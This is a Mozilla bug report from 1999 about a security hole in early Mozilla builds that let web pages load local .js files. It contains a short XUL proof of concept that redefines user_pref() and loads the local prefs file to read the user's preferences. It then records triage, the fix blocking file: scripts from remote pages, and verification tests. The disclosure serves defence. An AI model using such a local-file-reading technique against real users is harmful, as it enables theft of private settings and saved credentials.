Closed
Bug 12124
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Reading user's preferences
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+] To be fixed by 11/19)
There is a security vulnerability in Mozilla M8 (later versions are also
affected)
which allows web pages to execute .js files on the local machine.
If the preferences file is executed and the "user_pref" function is defined, a
sensitive information may be stolen.
The code in a .xul file is:
<html:script>
<![CDATA[
function user_pref(a,b) {
dump(a+"="+b+"\n");
}
]]>
</html:script>
<html:script src="file://c:/Users50/mozProfile/prefs50.js">
</html:script>
Demonstration is available at: http://www.nat.bg/~joro/mozilla/filesrc.xul
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Target Milestone: M11
Assignee | ||
Comment 1•25 years ago
|
||
<script src="file:..."> should be disabled from non-file pages, as was done in
4.x.
Assignee | ||
Comment 2•25 years ago
|
||
Move security bugs from M11 to M13; needed for beta but not for dogfood.
Assignee | ||
Updated•25 years ago
|
Summary: Reading user's preferences → [DOGFOOD] Reading user's preferences
Assignee | ||
Comment 3•25 years ago
|
||
Marking dogfood for analysis by PDT at jar's request.
Can you give us an example of cost to fix. Our alternative id to disable
password saving in the prefs. Need this for beta, but need more info for
dogfood. We will review on Monday night again. Thanks!
Assignee | ||
Updated•25 years ago
|
Whiteboard: [PDT+] → [PDT+] To be fixed by 11/19
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT 1999112908 Com
Test 1: Do same origin script src's work?
Yes
Test 2: Do local origin script src's work?
Yes
Test 3: Do remote origin / local file script src's work?
No
However, there is no error reported that a local file script scr was attempted?
Should there be?
I'll open a seperate bug regarding having Security Error conditions for illegal
<script src="file:..."> attempts, which will be non-PDT.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•